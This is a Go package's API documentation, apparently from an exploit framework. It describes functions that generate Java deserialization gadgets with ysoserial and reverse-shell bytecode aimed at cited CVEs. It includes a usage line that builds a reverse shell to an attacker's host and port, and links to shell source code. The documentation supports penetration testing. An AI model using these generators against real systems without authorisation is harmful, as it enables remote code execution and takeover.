Documentation
¶
Index ¶
- func Commons10CommandBytecode(commandStr string) (string, error)
- func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error)
- func CreateBeanutilsReverseShell(lhost string, lport int) string
- func CreateJythonRunCodeGadget(payload string) string
- func ErrorInvalidCommandLength(msg string) error
- func ReverseShellBytecode(conf *config.Config) (string, string)
- func ReverseShellScriptingEngineBytecode(conf *config.Config) (string, string)
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
func Commons10CommandBytecode ¶ added in v1.40.0
Generated using ysoserial with CommonsCollections10.
func Commons6ModifiedBashCommandBytecode ¶ added in v1.40.0
This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to prepend it with a bash -c, and the spaces do not need to be replaced with $IFS. It also solves redirection issues that are present in unmodified ysoserial payloads. This payload will always run the provided command using bash, hence the name. That said you should not need, nor should you prepend a <shell> -c to commandStr parameter passed here.
func CreateBeanutilsReverseShell ¶
This is a serialized java reverse shell. The gadget was generated by ysoserial but using the code in this pull https://github.com/frohoff/ysoserial/pull/96 and updated to make it easy to swap in the desired lhost+lport of our choosing without having to recreate the gadget.
The gadget works on both Windows and Linux and will automatically detect the platform and tool to use for executing commands (cmd.exe or /bin/bash).
func CreateJythonRunCodeGadget ¶ added in v1.1.0
This function generates a serialized Jython payload that executes arbitrary Python. It's the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2:
https://github.com/frohoff/ysoserial/pull/200/files
The payload can be used like so:
java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))
The payload was serialized and tested on Java 11.
func ErrorInvalidCommandLength ¶ added in v1.39.0
func ReverseShellBytecode ¶ added in v1.8.1
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
albinolobster@mournland:/tmp/java$ java -version openjdk version "1.8.0_392" OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08) OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode) albinolobster@mournland:/tmp/java$ javac ABCDEFG.java albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class -rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class
This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
func ReverseShellScriptingEngineBytecode ¶ added in v1.26.0
This is the Java bytecode for a reverse shell. You can find the source code here:
https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a
The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class via ScriptEngineManager calling URLClassLoader (see CVE-2024-37084)
The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:
parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ java -version openjdk version "1.8.0_422" OpenJDK Runtime Environment (build 1.8.0_422-8u422-b05-1~22.04-b05) OpenJDK 64-Bit Server VM (build 25.422-b05, mixed mode) parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ javac Reverse.java parallels@ubuntu-linux-22-04-02-desktop:~/Downloads$ ls -l Reverse.class -rw-rw-r-- 1 parallels parallels 3124 Sep 20 12:58 Reverse.class
This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).
Types ¶
This section is empty.
Source Files
Directories